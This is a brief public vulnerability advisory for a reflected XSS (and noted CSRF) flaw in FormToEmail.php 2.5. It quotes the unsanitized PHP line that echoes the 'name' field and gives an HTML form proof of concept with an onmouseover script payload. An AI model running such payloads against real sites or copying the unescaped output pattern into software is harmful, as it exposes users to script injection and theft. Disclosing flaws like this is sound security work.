Home » Malware Analysis » formtoemail (free email form) – XSS

formtoemail (free email form) – XSS


* Exploit Title: Reflective XSS
* Discovery Date: 02/09/2016
* Public Disclosure Date:03/10/2016
* Exploit Author: CJ Chamberland
* Contact: @cjchamberland - http://cjchamberland.com
* Vendor Homepage: formtoemail.com
* Software Link: formtoemail.com (formtoemail.php free is available for download from this site)
* Version: 2.5
* Tested on: apache/mac os
* Category: webapps
* Ident: OVE-20160305-2496
 
Description
================================================================================
Form accepts and processes un-sanitized input from forms, it is also susceptible to CSRF:

Line 234: Thank you <?php if(isset($_REQUEST['name'])){print stripslashes($_REQUEST['name']);} ?> 
 
 
PoC
================================================================================

<form method=post action="FormToEmail.php">
<input type=text name="name" value="<div onmouseover=alert(0);>Bob</div>">
<input type=submit>
</form>